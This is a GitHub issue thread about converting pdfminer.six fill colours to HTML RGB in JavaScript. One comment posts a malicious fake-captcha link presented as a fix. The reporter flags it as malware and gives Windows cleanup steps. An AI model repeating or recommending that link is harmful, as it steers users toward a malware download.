### ISSUE TITLE
There is a color difference in the non_stroking_color

### ISSUE THREAD

**Issue by KaboChow** [pdfminer/pdfminer.six#1043]
Hi Team,
I am trying to use the following JS code to convert the obtained non_stoking.color into RGB color for use in HTML.
`
              
                if(fillColor.length===1){
                    return 'rgb(' + (255*(1.0-fillColor[0])).toFixed(0) + ')';
                }
                
                if(fillColor.length===3){
                    const r = 255 * fillColor[0];
                    const g = 255 * fillColor[1];
                    const b = 255 * fillColor[2];
                    return 'rgb(' + r.toFixed(0) + ',' + g.toFixed(0) +',' + b.toFixed(0) + ')';
                }
               
                if(fillColor.length===4){
                    const r = 255*(1.0-(fillColor[0]+fillColor[3]));
                    const g = 255*(1.0-(fillColor[1]+fillColor[3]));
                    const b = 255*(1.0-(fillColor[2]+fillColor[3]));
                    return 'rgb(' + r.toFixed(0) + ',' + g.toFixed(0) +',' + b.toFixed(0) + ')';
                }
`

But there are obvious color differences in the obtained colors.
pdf:
![image](https://github.com/user-attachments/assets/f9b23bf4-5f46-4fbc-9304-ecaeb5ce2415)
html:
![image](https://github.com/user-attachments/assets/759684c0-56ab-4ca7-a481-2e9d1337590b)

This is the PDF I used for testing:
[TEST 5 - 48in-Height-Chef-Supplies-Banner-d4-ced6f345009972ad3e50309422be6654.pdf](https://github.com/user-attachments/files/17178323/TEST.5.-.48in-Height-Chef-Supplies-Banner-d4-ced6f345009972ad3e50309422be6654.pdf)

Does anyone know how to solve it? thank you

**Comment by ummm288** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by KaboChow** [comment]
Hi @ummm288 ，Thank you for your answer. This is my first time witnessing the operation of malicious programs. My father is a Chinese Taoist priest, and I will invite him to perform a ritual for you, causing you to suffer from illness and disasters throughout your life

**Comment by KaboChow** [comment]
> to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html) maybe this will solve your problem.

This is a malicious link. Do not click it. It will use machine verification as an excuse to trick you into executing a malicious download command on your computer.

If you have already executed it, you can follow these steps:
1.Disconnect from the internet.
2.Press Win+R, type cmd to open the command line tool, then in the command line input ‘tasklist | findstr powershell’ to list the PowerShell processes, and ‘taskkill /PID <process_id> /F’ to terminate all PowerShell processes.

**Comment by jollyfish-cjy** [comment]
hi, maybe you can try pymupdf.

**Comment by KaboChow** [comment]
> hi, maybe you can try pymupdf.

Thanks！@jollyfish-cjy 
pymupdf looks like it has a lot more interesting features, I will give it a try
